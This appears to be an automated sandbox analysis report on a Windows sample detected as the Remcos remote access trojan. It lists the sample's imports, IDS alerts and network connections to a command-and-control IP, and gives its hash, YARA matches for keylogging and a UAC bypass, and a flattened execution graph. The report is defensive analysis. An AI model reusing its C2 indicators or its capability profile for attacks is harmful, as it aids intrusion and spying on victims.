GetOEMCP, IsValidCodePage, FindFirstFileExA, HeapReAlloc, ReadConsoleW, GetConsoleMode, GetConsoleCP, FlushFileBuffers, GetFileType, GetTimeZoneInformation, EnumSystemLocalesW, GetUserDefaultLCID, IsValidLocale, GetTimeFormatW, GetDateFormatW, GetACP, GetModuleHandleExW, MoveFileExW, LoadLibraryExW, RaiseException, RtlUnwind, GetCPInfo, GetStringTypeW, GetLocaleInfoW, LCMapStringW, CompareStringW, MultiByteToWideChar, DecodePointer, EncodePointer, TlsFree, TlsSetValue, GetFileSize, TerminateThread, GetLastError, GetModuleHandleA, RemoveDirectoryW, MoveFileW, SetFilePointerEx, CreateDirectoryW, GetLogicalDriveStringsA, DeleteFileW, FindNextFileA, DeleteFileA, SetFileAttributesW, GetFileAttributesW, FindClose, lstrlenA, GetDriveTypeA, FindNextFileW, GetFileSizeEx, FindFirstFileW, GetModuleHandleW, ExitProcess, GetProcAddress, CreateMutexA, GetCurrentProcess, CreateProcessA, PeekNamedPipe, CreatePipe, TerminateProcess, ReadFile, HeapFree, HeapCreate, CreateEventA, GetLocalTime, CreateThread, SetEvent, CreateEventW, WaitForSingleObject, Sleep, GetModuleFileNameW, CloseHandle, ExitThread, CreateFileW, WriteFile, FindNextVolumeW, TlsGetValue, TlsAlloc, SwitchToThread, WideCharToMultiByte, InitializeSListHead, GetSystemTimeAsFileTime, GetCurrentThreadId, IsProcessorFeaturePresent, GetStartupInfoW, SetUnhandledExceptionFilter, UnhandledExceptionFilter, IsDebuggerPresent, WaitForSingleObjectEx, ResetEvent, InitializeCriticalSectionAndSpinCount, SetEndOfFile
                             USER32.dll | DefWindowProcA, TranslateMessage, DispatchMessageA, GetMessageA, GetWindowTextW, wsprintfW, GetClipboardData, UnhookWindowsHookEx, GetForegroundWindow, ToUnicodeEx, GetKeyboardLayout, SetWindowsHookExA, CloseClipboard, OpenClipboard, GetKeyboardState, CallNextHookEx, GetKeyboardLayoutNameA, GetKeyState, GetWindowTextLengthW, GetWindowThreadProcessId, SetForegroundWindow, SetClipboardData, EnumWindows, ExitWindowsEx, EmptyClipboard, ShowWindow, SetWindowTextW, MessageBoxW, IsWindowVisible, CreateWindowExA, SendInput, EnumDisplaySettingsW, mouse_event, MapVirtualKeyA, TrackPopupMenu, CreatePopupMenu, AppendMenuA, RegisterClassExA, GetCursorPos, SystemParametersInfoW, GetIconInfo, GetSystemMetrics, CloseWindow, DrawIcon
                             GDI32.dll | BitBlt, CreateCompatibleBitmap, CreateCompatibleDC, StretchBlt, GetDIBits, DeleteDC, DeleteObject, CreateDCA, GetObjectA, SelectObject
                             ADVAPI32.dll | LookupPrivilegeValueA, CryptAcquireContextA, CryptGenRandom, CryptReleaseContext, GetUserNameW, RegEnumKeyExA, QueryServiceStatus, CloseServiceHandle, OpenSCManagerW, OpenSCManagerA, ControlService, StartServiceW, QueryServiceConfigW, ChangeServiceConfigW, OpenServiceW, EnumServicesStatusW, AdjustTokenPrivileges, RegDeleteKeyA, OpenProcessToken, RegCreateKeyA, RegCloseKey, RegQueryInfoKeyW, RegQueryValueExA, RegCreateKeyExW, RegEnumKeyExW, RegSetValueExW, RegSetValueExA, RegOpenKeyExA, RegOpenKeyExW, RegCreateKeyW, RegDeleteValueW, RegEnumValueW, RegQueryValueExW
                             SHELL32.dll | ShellExecuteExA, Shell_NotifyIconA, ExtractIconA, ShellExecuteW
                             ole32.dll | CoInitializeEx, CoGetObject, CoUninitialize
                             SHLWAPI.dll | StrToIntA, PathFileExistsW, PathFileExistsA
                             WINMM.dll | mciSendStringA, mciSendStringW, waveInClose, waveInStop, waveInStart, waveInUnprepareHeader, waveInOpen, waveInAddBuffer, waveInPrepareHeader, PlaySoundW
                             WS2_32.dll | send, WSAStartup, socket, connect, WSAGetLastError, recv, closesocket, inet_ntoa, htons, htonl, getservbyname, ntohs, getservbyport, gethostbyaddr, inet_addr, WSASetLastError, gethostbyname
                             urlmon.dll | URLOpenBlockingStreamW, URLDownloadToFileW
                             gdiplus.dll | GdipAlloc, GdiplusStartup, GdipGetImageEncoders, GdipLoadImageFromStream, GdipSaveImageToStream, GdipGetImageEncodersSize, GdipFree, GdipDisposeImage, GdipCloneImage
                             WININET.dll | InternetOpenUrlW, InternetOpenW, InternetCloseHandle, InternetReadFile
                             Language of compilation system | Country where language is spoken
                             English | United States
                             Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
                             2024-12-06T14:11:10.451566+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.6 | 50002 | 104.243.246.120 | 2030 | TCP
                             2024-12-06T14:11:40.154154+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.6 | 49731 | 104.243.246.120 | 2030 | TCP
                             2024-12-06T14:12:03.185927+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.6 | 49792 | 104.243.246.120 | 2030 | TCP
                             2024-12-06T14:12:26.201641+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.6 | 49844 | 104.243.246.120 | 2030 | TCP
                             2024-12-06T14:12:49.249157+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.6 | 49900 | 104.243.246.120 | 2030 | TCP
                             2024-12-06T14:13:12.280515+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.6 | 49953 | 104.243.246.120 | 2030 | TCP
                             2024-12-06T14:13:35.315155+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.6 | 49995 | 104.243.246.120 | 2030 | TCP
                             2024-12-06T14:13:58.359734+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.6 | 49996 | 104.243.246.120 | 2030 | TCP
                             2024-12-06T14:14:21.406877+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.6 | 49998 | 104.243.246.120 | 2030 | TCP
                             2024-12-06T14:14:44.439475+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.6 | 49999 | 104.243.246.120 | 2030 | TCP
                             2024-12-06T14:15:07.501287+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.6 | 50001 | 104.243.246.120 | 2030 | TCP
                             Timestamp | Source Port | Dest Port | Source IP | Dest IP
                             Dec 6, 2024 14:11:18.112397909 CET | 49731 | 2030 | 192.168.2.6 | 104.243.246.120
                             Dec 6, 2024 14:11:18.232120037 CET | 2030 | 49731 | 104.243.246.120 | 192.168.2.6
                             Dec 6, 2024 14:11:18.232254028 CET | 49731 | 2030 | 192.168.2.6 | 104.243.246.120
                             Dec 6, 2024 14:11:18.238980055 CET | 49731 | 2030 | 192.168.2.6 | 104.243.246.120
                             Dec 6, 2024 14:11:18.359457970 CET | 2030 | 49731 | 104.243.246.120 | 192.168.2.6
                             Dec 6, 2024 14:11:40.154031038 CET | 2030 | 49731 | 104.243.246.120 | 192.168.2.6
                             Dec 6, 2024 14:11:40.154154062 CET | 49731 | 2030 | 192.168.2.6 | 104.243.246.120
                             Dec 6, 2024 14:11:40.154295921 CET | 49731 | 2030 | 192.168.2.6 | 104.243.246.120
                             Dec 6, 2024 14:11:40.273987055 CET | 2030 | 49731 | 104.243.246.120 | 192.168.2.6
                             Dec 6, 2024 14:11:41.167937994 CET | 49792 | 2030 | 192.168.2.6 | 104.243.246.120
                             Dec 6, 2024 14:11:41.287806034 CET | 2030 | 49792 | 104.243.246.120 | 192.168.2.6
                             Dec 6, 2024 14:11:41.287990093 CET | 49792 | 2030 | 192.168.2.6 | 104.243.246.120
                             Dec 6, 2024 14:11:41.291743040 CET | 49792 | 2030 | 192.168.2.6 | 104.243.246.120
                             Dec 6, 2024 14:11:41.411520004 CET | 2030 | 49792 | 104.243.246.120 | 192.168.2.6
                             Dec 6, 2024 14:12:03.185812950 CET | 2030 | 49792 | 104.243.246.120 | 192.168.2.6
                             Dec 6, 2024 14:12:03.185926914 CET | 49792 | 2030 | 192.168.2.6 | 104.243.246.120
                             Dec 6, 2024 14:12:03.186036110 CET | 49792 | 2030 | 192.168.2.6 | 104.243.246.120
                             Dec 6, 2024 14:12:03.305752039 CET | 2030 | 49792 | 104.243.246.120 | 192.168.2.6
                             Dec 6, 2024 14:12:04.198139906 CET | 49844 | 2030 | 192.168.2.6 | 104.243.246.120
                             Dec 6, 2024 14:12:04.318192005 CET | 2030 | 49844 | 104.243.246.120 | 192.168.2.6
                             Dec 6, 2024 14:12:04.318341970 CET | 49844 | 2030 | 192.168.2.6 | 104.243.246.120
                             Dec 6, 2024 14:12:04.322211981 CET | 49844 | 2030 | 192.168.2.6 | 104.243.246.120
                             Dec 6, 2024 14:12:04.442943096 CET | 2030 | 49844 | 104.243.246.120 | 192.168.2.6
                             Dec 6, 2024 14:12:26.201550007 CET | 2030 | 49844 | 104.243.246.120 | 192.168.2.6
                             Dec 6, 2024 14:12:26.201641083 CET | 49844 | 2030 | 192.168.2.6 | 104.243.246.120
                             Dec 6, 2024 14:12:26.201704025 CET | 49844 | 2030 | 192.168.2.6 | 104.243.246.120
                             Dec 6, 2024 14:12:26.321434021 CET | 2030 | 49844 | 104.243.246.120 | 192.168.2.6
                             Dec 6, 2024 14:12:27.214210987 CET | 49900 | 2030 | 192.168.2.6 | 104.243.246.120
                             Dec 6, 2024 14:12:27.334284067 CET | 2030 | 49900 | 104.243.246.120 | 192.168.2.6
                             Dec 6, 2024 14:12:27.339510918 CET | 49900 | 2030 | 192.168.2.6 | 104.243.246.120
                             Dec 6, 2024 14:12:27.343054056 CET | 49900 | 2030 | 192.168.2.6 | 104.243.246.120
                             Dec 6, 2024 14:12:27.462800980 CET | 2030 | 49900 | 104.243.246.120 | 192.168.2.6
                             Dec 6, 2024 14:12:49.249105930 CET | 2030 | 49900 | 104.243.246.120 | 192.168.2.6
                             Dec 6, 2024 14:12:49.249156952 CET | 49900 | 2030 | 192.168.2.6 | 104.243.246.120
                             Dec 6, 2024 14:12:49.249226093 CET | 49900 | 2030 | 192.168.2.6 | 104.243.246.120
                             Dec 6, 2024 14:12:49.369544029 CET | 2030 | 49900 | 104.243.246.120 | 192.168.2.6
                             Dec 6, 2024 14:12:50.261045933 CET | 49953 | 2030 | 192.168.2.6 | 104.243.246.120
                             Dec 6, 2024 14:12:50.380913019 CET | 2030 | 49953 | 104.243.246.120 | 192.168.2.6
                             Dec 6, 2024 14:12:50.381133080 CET | 49953 | 2030 | 192.168.2.6 | 104.243.246.120
                             Dec 6, 2024 14:12:50.384814024 CET | 49953 | 2030 | 192.168.2.6 | 104.243.246.120
                             Dec 6, 2024 14:12:50.504900932 CET | 2030 | 49953 | 104.243.246.120 | 192.168.2.6
                             Dec 6, 2024 14:13:12.280420065 CET | 2030 | 49953 | 104.243.246.120 | 192.168.2.6
                             Dec 6, 2024 14:13:12.280514956 CET | 49953 | 2030 | 192.168.2.6 | 104.243.246.120
                             Dec 6, 2024 14:13:12.280548096 CET | 49953 | 2030 | 192.168.2.6 | 104.243.246.120
                             Dec 6, 2024 14:13:12.400779963 CET | 2030 | 49953 | 104.243.246.120 | 192.168.2.6
                             Dec 6, 2024 14:13:13.291778088 CET | 49995 | 2030 | 192.168.2.6 | 104.243.246.120
                             Dec 6, 2024 14:13:13.411799908 CET | 2030 | 49995 | 104.243.246.120 | 192.168.2.6
                             Dec 6, 2024 14:13:13.412008047 CET | 49995 | 2030 | 192.168.2.6 | 104.243.246.120
                             Dec 6, 2024 14:13:13.415560007 CET | 49995 | 2030 | 192.168.2.6 | 104.243.246.120
                             Dec 6, 2024 14:13:13.535326004 CET | 2030 | 49995 | 104.243.246.120 | 192.168.2.6
                             Dec 6, 2024 14:13:35.314971924 CET | 2030 | 49995 | 104.243.246.120 | 192.168.2.6
                             Dec 6, 2024 14:13:35.315155029 CET | 49995 | 2030 | 192.168.2.6 | 104.243.246.120
                             Dec 6, 2024 14:13:35.315414906 CET | 49995 | 2030 | 192.168.2.6 | 104.243.246.120
                             Dec 6, 2024 14:13:35.435136080 CET | 2030 | 49995 | 104.243.246.120 | 192.168.2.6
                             Dec 6, 2024 14:13:36.331459999 CET | 49996 | 2030 | 192.168.2.6 | 104.243.246.120
                             Dec 6, 2024 14:13:36.451451063 CET | 2030 | 49996 | 104.243.246.120 | 192.168.2.6
                             Dec 6, 2024 14:13:36.451533079 CET | 49996 | 2030 | 192.168.2.6 | 104.243.246.120
                             Dec 6, 2024 14:13:36.454936028 CET | 49996 | 2030 | 192.168.2.6 | 104.243.246.120
                             Dec 6, 2024 14:13:36.574681044 CET | 2030 | 49996 | 104.243.246.120 | 192.168.2.6
                             Dec 6, 2024 14:13:58.359661102 CET | 2030 | 49996 | 104.243.246.120 | 192.168.2.6
                             Dec 6, 2024 14:13:58.359734058 CET | 49996 | 2030 | 192.168.2.6 | 104.243.246.120
                             Dec 6, 2024 14:13:58.359827042 CET | 49996 | 2030 | 192.168.2.6 | 104.243.246.120
                             Dec 6, 2024 14:13:58.479769945 CET | 2030 | 49996 | 104.243.246.120 | 192.168.2.6
                             Dec 6, 2024 14:13:59.369754076 CET | 49998 | 2030 | 192.168.2.6 | 104.243.246.120
                             Dec 6, 2024 14:13:59.490211964 CET | 2030 | 49998 | 104.243.246.120 | 192.168.2.6
                             Dec 6, 2024 14:13:59.490367889 CET | 49998 | 2030 | 192.168.2.6 | 104.243.246.120
                             Dec 6, 2024 14:13:59.493748903 CET | 49998 | 2030 | 192.168.2.6 | 104.243.246.120
                             Dec 6, 2024 14:13:59.613567114 CET | 2030 | 49998 | 104.243.246.120 | 192.168.2.6
                             Dec 6, 2024 14:14:21.406780958 CET | 2030 | 49998 | 104.243.246.120 | 192.168.2.6
                             Dec 6, 2024 14:14:21.406877041 CET | 49998 | 2030 | 192.168.2.6 | 104.243.246.120
                             Dec 6, 2024 14:14:21.406960964 CET | 49998 | 2030 | 192.168.2.6 | 104.243.246.120
                             Dec 6, 2024 14:14:21.526964903 CET | 2030 | 49998 | 104.243.246.120 | 192.168.2.6
                             Dec 6, 2024 14:14:22.417809963 CET | 49999 | 2030 | 192.168.2.6 | 104.243.246.120
                             Dec 6, 2024 14:14:22.537770033 CET | 2030 | 49999 | 104.243.246.120 | 192.168.2.6
                             Dec 6, 2024 14:14:22.537856102 CET | 49999 | 2030 | 192.168.2.6 | 104.243.246.120
                             Dec 6, 2024 14:14:22.542993069 CET | 49999 | 2030 | 192.168.2.6 | 104.243.246.120
                             Dec 6, 2024 14:14:22.662717104 CET | 2030 | 49999 | 104.243.246.120 | 192.168.2.6
                             Dec 6, 2024 14:14:44.438077927 CET | 2030 | 49999 | 104.243.246.120 | 192.168.2.6
                             Dec 6, 2024 14:14:44.439475060 CET | 49999 | 2030 | 192.168.2.6 | 104.243.246.120
                             Dec 6, 2024 14:14:44.439532995 CET | 49999 | 2030 | 192.168.2.6 | 104.243.246.120
                             Dec 6, 2024 14:14:44.559504986 CET | 2030 | 49999 | 104.243.246.120 | 192.168.2.6
                             Dec 6, 2024 14:14:45.460443020 CET | 50001 | 2030 | 192.168.2.6 | 104.243.246.120
                             Dec 6, 2024 14:14:45.580794096 CET | 2030 | 50001 | 104.243.246.120 | 192.168.2.6
                             Dec 6, 2024 14:14:45.580873013 CET | 50001 | 2030 | 192.168.2.6 | 104.243.246.120
                             Dec 6, 2024 14:14:45.584673882 CET | 50001 | 2030 | 192.168.2.6 | 104.243.246.120
                             Dec 6, 2024 14:14:45.704428911 CET | 2030 | 50001 | 104.243.246.120 | 192.168.2.6
                             Dec 6, 2024 14:15:07.501202106 CET | 2030 | 50001 | 104.243.246.120 | 192.168.2.6
                             Dec 6, 2024 14:15:07.501286983 CET | 50001 | 2030 | 192.168.2.6 | 104.243.246.120
                             Dec 6, 2024 14:15:07.501383066 CET | 50001 | 2030 | 192.168.2.6 | 104.243.246.120
                             Dec 6, 2024 14:15:07.621804953 CET | 2030 | 50001 | 104.243.246.120 | 192.168.2.6
                             Dec 6, 2024 14:15:08.510446072 CET | 50002 | 2030 | 192.168.2.6 | 104.243.246.120
                             Dec 6, 2024 14:15:08.630511045 CET | 2030 | 50002 | 104.243.246.120 | 192.168.2.6
                             Dec 6, 2024 14:15:08.630620956 CET | 50002 | 2030 | 192.168.2.6 | 104.243.246.120
                             Dec 6, 2024 14:15:08.635371923 CET | 50002 | 2030 | 192.168.2.6 | 104.243.246.120
                             Dec 6, 2024 14:15:08.755263090 CET | 2030 | 50002 | 104.243.246.120 | 192.168.2.6

                            Target ID:1
                            Start time:08:11:17
                            Start date:06/12/2024
                            Path:C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe"
                            Imagebase:0x400000
                            File size:493'056 bytes
                            MD5 hash:68011A26BB98D3B77DE9594AE7624358
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000001.00000000.2293845385.0000000000457000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000001.00000000.2293845385.0000000000457000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000001.00000000.2293845385.0000000000457000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                            • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000001.00000000.2293845385.0000000000457000.00000002.00000001.01000000.00000003.sdmp, Author: unknown
                            • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                            • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmp, Author: unknown
                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000001.00000002.4758896538.00000000005CE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                            Reputation:low
                            Has exited:false

                              Execution Graph

                              Execution Coverage:3.1%
                              Dynamic/Decrypted Code Coverage:0%
                              Signature Coverage:26.2%
                              Total number of Nodes:1073
                              Total number of Limit Nodes:62
                             execution_graph: [node/edge data of the interactive execution graph, not reproducible as text. Each node is a function address annotated with the Windows API calls made there; the nodes of this fragment that name APIs are: 41d071 DeleteCriticalSection/EnterCriticalSection/LeaveCriticalSection; 446b28 RtlAllocateHeap; 44ba11 RtlReAllocateHeap; 43293a CryptAcquireContextA, 43295b CryptGenRandom, 432970 CryptReleaseContext; 43265b CryptAcquireContextA/CryptGenRandom/CryptReleaseContext; 4260f7 recv; 42610e send; 44e1be GetEnvironmentStringsW; 44e200 FreeEnvironmentStringsW; 444acc EnterCriticalSection; 43aa0f LeaveCriticalSection; 433b44 IsProcessorFeaturePresent/IsDebuggerPresent/SetUnhandledExceptionFilter/UnhandledExceptionFilter; 433e0a IsProcessorFeaturePresent; 44335e IsProcessorFeaturePresent/SetUnhandledExceptionFilter/UnhandledExceptionFilter/GetCurrentProcess/TerminateProcess; 433c94 GetModuleHandleW; 41bce3 LoadLibraryA/GetProcAddress; 40d783 GetModuleFileNameW; 4124b7 RegOpenKeyExA; 41265d RegOpenKeyExA/RegQueryValueExA/RegCloseKey; 4069ba CreateProcessA/CloseHandle]
46360 401e18 26 API calls 46361 40db14 46360->46361 46364 401e13 26 API calls 46361->46364 46365 40db9c 46362->46365 46364->46335 46905 40bc67 46 API calls _wcslen 46365->46905 46366 40dd25 46655 4126d2 RegCreateKeyA 46366->46655 46641 4128a2 46367->46641 46372 40dc45 ctype 46376 401d64 28 API calls 46372->46376 46373 40dbac 46373->46367 46374 401d64 28 API calls 46375 40dd47 46374->46375 46661 43a5e7 46375->46661 46377 40dc5c 46376->46377 46377->46353 46380 40dc70 46377->46380 46382 401d64 28 API calls 46380->46382 46381 40dd5e 46908 41beb0 87 API calls ___scrt_fastfail 46381->46908 46384 40dc7e 46382->46384 46383 40dd81 46386 401f66 28 API calls 46383->46386 46387 41ae08 28 API calls 46384->46387 46389 40dd96 46386->46389 46390 40dc87 46387->46390 46388 40dd65 CreateThread 46388->46383 47308 41c96f 10 API calls 46388->47308 46391 401f66 28 API calls 46389->46391 46906 40e219 112 API calls 46390->46906 46393 40dda5 46391->46393 46665 41a686 46393->46665 46394 40dc8c 46394->46353 46396 40dc93 46394->46396 46396->46291 46398 401d64 28 API calls 46399 40ddb6 46398->46399 46400 401d64 28 API calls 46399->46400 46401 40ddcb 46400->46401 46402 401d64 28 API calls 46401->46402 46403 40ddeb 46402->46403 46404 43a5e7 _strftime 42 API calls 46403->46404 46405 40ddf8 46404->46405 46406 401d64 28 API calls 46405->46406 46407 40de03 46406->46407 46408 401d64 28 API calls 46407->46408 46409 40de14 46408->46409 46410 401d64 28 API calls 46409->46410 46411 40de29 46410->46411 46412 401d64 28 API calls 46411->46412 46413 40de3a 46412->46413 46414 40de41 StrToIntA 46413->46414 46689 409517 46414->46689 46417 401d64 28 API calls 46418 40de5c 46417->46418 46419 40dea1 46418->46419 46420 40de68 46418->46420 46422 401d64 28 API calls 46419->46422 46909 43360d 22 API calls 3 library calls 46420->46909 46424 40deb1 46422->46424 46423 40de71 46425 401d64 28 API calls 46423->46425 46428 40def9 46424->46428 46429 40debd 46424->46429 46426 40de84 46425->46426 46427 40de8b CreateThread 
46426->46427 46427->46419 47311 419128 109 API calls 2 library calls 46427->47311 46430 401d64 28 API calls 46428->46430 46910 43360d 22 API calls 3 library calls 46429->46910 46432 40df02 46430->46432 46436 40df6c 46432->46436 46437 40df0e 46432->46437 46433 40dec6 46434 401d64 28 API calls 46433->46434 46435 40ded8 46434->46435 46440 40dedf CreateThread 46435->46440 46438 401d64 28 API calls 46436->46438 46439 401d64 28 API calls 46437->46439 46441 40df75 46438->46441 46442 40df1e 46439->46442 46440->46428 47310 419128 109 API calls 2 library calls 46440->47310 46443 40df81 46441->46443 46444 40dfba 46441->46444 46445 401d64 28 API calls 46442->46445 46447 401d64 28 API calls 46443->46447 46714 41a7a2 GetComputerNameExW GetUserNameW 46444->46714 46448 40df33 46445->46448 46450 40df8a 46447->46450 46911 40c854 32 API calls 46448->46911 46455 401d64 28 API calls 46450->46455 46451 401e18 26 API calls 46452 40dfce 46451->46452 46454 401e13 26 API calls 46452->46454 46458 40dfd7 46454->46458 46459 40df9f 46455->46459 46456 40df46 46457 401e18 26 API calls 46456->46457 46460 40df52 46457->46460 46461 40dfe0 SetProcessDEPPolicy 46458->46461 46462 40dfe3 CreateThread 46458->46462 46468 43a5e7 _strftime 42 API calls 46459->46468 46463 401e13 26 API calls 46460->46463 46461->46462 46464 40e004 46462->46464 46465 40dff8 CreateThread 46462->46465 47279 40e54f 46462->47279 46469 40df5b CreateThread 46463->46469 46466 40e019 46464->46466 46467 40e00d CreateThread 46464->46467 46465->46464 47306 410f36 137 API calls 46465->47306 46471 40e073 46466->46471 46473 401f66 28 API calls 46466->46473 46467->46466 47307 411524 38 API calls ___scrt_fastfail 46467->47307 46470 40dfac 46468->46470 46469->46436 47309 40196b 49 API calls _strftime 46469->47309 46912 40b95c 7 API calls 46470->46912 46725 41246e RegOpenKeyExA 46471->46725 46474 40e046 46473->46474 46913 404c9e 28 API calls 46474->46913 46478 40e053 46480 401f66 28 API calls 46478->46480 46479 40e12a 46737 40cbac 46479->46737 
46482 40e062 46480->46482 46481 41ae08 28 API calls 46484 40e0a4 46481->46484 46485 41a686 79 API calls 46482->46485 46728 412584 RegOpenKeyExW 46484->46728 46488 40e067 46485->46488 46489 401eea 26 API calls 46488->46489 46489->46471 46492 401e13 26 API calls 46495 40e0c5 46492->46495 46493 40e0ed DeleteFileW 46494 40e0f4 46493->46494 46493->46495 46497 41ae08 28 API calls 46494->46497 46495->46493 46495->46494 46496 40e0db Sleep 46495->46496 46914 401e07 46496->46914 46499 40e104 46497->46499 46733 41297a RegOpenKeyExW 46499->46733 46501 40e117 46502 401e13 26 API calls 46501->46502 46503 40e121 46502->46503 46504 401e13 26 API calls 46503->46504 46504->46479 46505->46192 46506->46188 46507->46196 46508->46205 46509->46207 46510->46210 46511->46185 46512->46189 46513->46193 46514->46214 46515->46216 46516->46218 46517->46221 46519 433c71 GetStartupInfoW 46518->46519 46519->46225 46521 44dddb 46520->46521 46522 44ddd2 46520->46522 46521->46229 46525 44dcc8 51 API calls 5 library calls 46522->46525 46524->46229 46525->46521 46527 41bd22 LoadLibraryA GetProcAddress 46526->46527 46528 41bd12 GetModuleHandleA GetProcAddress 46526->46528 46529 41bd4b 32 API calls 46527->46529 46530 41bd3b LoadLibraryA GetProcAddress 46527->46530 46528->46527 46529->46233 46530->46529 46918 41a63f FindResourceA 46531->46918 46534 43a88c ___crtLCMapStringA 21 API calls 46535 40e192 _Yarn 46534->46535 46921 401f86 46535->46921 46538 401eef 26 API calls 46539 40e1b8 46538->46539 46540 401eea 26 API calls 46539->46540 46541 40e1c1 46540->46541 46542 43a88c ___crtLCMapStringA 21 API calls 46541->46542 46543 40e1d2 _Yarn 46542->46543 46925 406052 46543->46925 46545 40e205 46545->46235 46547 401fcc 46546->46547 46933 402501 46547->46933 46549 401fea 46549->46238 46551 41afd6 46550->46551 46554 41b048 46551->46554 46563 401eef 26 API calls 46551->46563 46566 401eea 26 API calls 46551->46566 46570 41b046 46551->46570 46938 403b60 28 API calls 46551->46938 46939 41bfa9 28 API calls 46551->46939 
46552 401eea 26 API calls 46553 41b078 46552->46553 46555 401eea 26 API calls 46553->46555 46940 403b60 28 API calls 46554->46940 46558 41b080 46555->46558 46560 401eea 26 API calls 46558->46560 46559 41b054 46562 401eef 26 API calls 46559->46562 46561 40d7c6 46560->46561 46571 40e8bd 46561->46571 46564 41b05d 46562->46564 46563->46551 46565 401eea 26 API calls 46564->46565 46567 41b065 46565->46567 46566->46551 46941 41bfa9 28 API calls 46567->46941 46570->46552 46572 40e8ca 46571->46572 46574 40e8da 46572->46574 46942 40200a 26 API calls 46572->46942 46574->46243 46576 40200a 46575->46576 46580 40203a 46576->46580 46943 402654 26 API calls 46576->46943 46578 40202b 46944 4026ba 26 API calls _Deallocate 46578->46944 46580->46245 46582 401d6c 46581->46582 46583 401d74 46582->46583 46945 401fff 28 API calls 46582->46945 46583->46250 46587 404ccb 46586->46587 46946 402e78 46587->46946 46589 404cee 46589->46257 46955 404bc4 46590->46955 46592 405cf4 46592->46260 46594 401efe 46593->46594 46596 401f0a 46594->46596 46964 4021b9 26 API calls 46594->46964 46596->46264 46598 4021b9 46597->46598 46599 4021e8 46598->46599 46965 40262e 26 API calls _Deallocate 46598->46965 46599->46266 46603 401ec9 46601->46603 46602 401ee4 46602->46274 46603->46602 46604 402325 28 API calls 46603->46604 46604->46602 46966 401e8f 46605->46966 46607 40bee1 CreateMutexA GetLastError 46607->46290 46968 41b15b 46608->46968 46610 41a471 46972 412513 RegOpenKeyExA 46610->46972 46613 401eef 26 API calls 46614 41a49f 46613->46614 46615 401eea 26 API calls 46614->46615 46616 41a4a7 46615->46616 46617 41a4fa 46616->46617 46618 412513 31 API calls 46616->46618 46617->46296 46619 41a4cd 46618->46619 46620 41a4d8 StrToIntA 46619->46620 46621 41a4ef 46620->46621 46622 41a4e6 46620->46622 46624 401eea 26 API calls 46621->46624 46977 41c102 28 API calls 46622->46977 46624->46617 46626 40698f 46625->46626 46627 4124b7 3 API calls 46626->46627 46628 406996 46627->46628 46628->46306 46628->46307 46630 41ae1c 
46629->46630 46978 40b027 46630->46978 46632 41ae24 46632->46321 46634 401e27 46633->46634 46636 401e33 46634->46636 46987 402121 26 API calls 46634->46987 46636->46325 46638 402121 46637->46638 46639 402150 46638->46639 46988 402718 26 API calls _Deallocate 46638->46988 46639->46327 46642 4128c0 46641->46642 46643 406052 28 API calls 46642->46643 46644 4128d5 46643->46644 46645 401fbd 28 API calls 46644->46645 46646 4128e5 46645->46646 46647 4126d2 29 API calls 46646->46647 46648 4128ef 46647->46648 46649 401eea 26 API calls 46648->46649 46650 4128fc 46649->46650 46650->46372 46652 401f6e 46651->46652 46989 402301 46652->46989 46656 412722 46655->46656 46657 4126eb 46655->46657 46658 401eea 26 API calls 46656->46658 46660 4126fd RegSetValueExA RegCloseKey 46657->46660 46659 40dd3b 46658->46659 46659->46374 46660->46656 46662 43a600 _strftime 46661->46662 46993 43993e 46662->46993 46666 41a737 46665->46666 46667 41a69c GetLocalTime 46665->46667 46669 401eea 26 API calls 46666->46669 46668 404cbf 28 API calls 46667->46668 46670 41a6de 46668->46670 46671 41a73f 46669->46671 46672 405ce6 28 API calls 46670->46672 46673 401eea 26 API calls 46671->46673 46674 41a6ea 46672->46674 46675 40ddaa 46673->46675 47027 4027cb 